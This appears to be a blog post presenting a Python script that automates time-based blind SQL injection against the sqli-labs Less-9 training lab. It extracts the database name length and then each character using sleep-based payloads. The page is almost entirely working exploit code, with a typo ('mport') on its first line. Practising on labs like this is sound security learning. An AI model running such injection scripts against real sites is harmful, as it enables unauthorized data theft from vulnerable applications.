sql-labs-less9 SQL注入-延迟注入-自动化脚本

 

mport requests
import string

'''
payload: ?id=2' and sleep(5) --+
'''

url = "http://192.168.31.203/sqli-labs-master1/Less-9/?id=1"
special_char = "' "
char_set = string.printable.strip()

def get_timeout(url):
    try:
        res = requests.get(url = url, timeout = 3)
        return res.text
    except:
        return "timeout"


def get_content_length(url):
    for i in range(1,1000):
        payload = f"and if(length((select database()))={i},sleep(5),1) --+"
        full_url = url + special_char + payload
        print(full_url)

        if "timeout" in get_timeout(full_url):
            break
    return i

content_length = get_content_length(url)
print(f"[+] The length of content: {content_length}")

def get_content(url, content_length):
    content = ""
    for i in range(1, content_length + 1):
        for j in char_set:
            payload = f"and if(ascii(substr((select database()),{i},1))={ord(j)},sleep(5),1)-- "
            full_url = url + special_char + payload
    # print(full_url)

            if "timeout" in get_timeout(full_url):
                content += j
                print(f"[+] The content: {content}")
                break
    return content

get_content(url, content_length)

 

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爱吃红薯拔丝的小鹿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值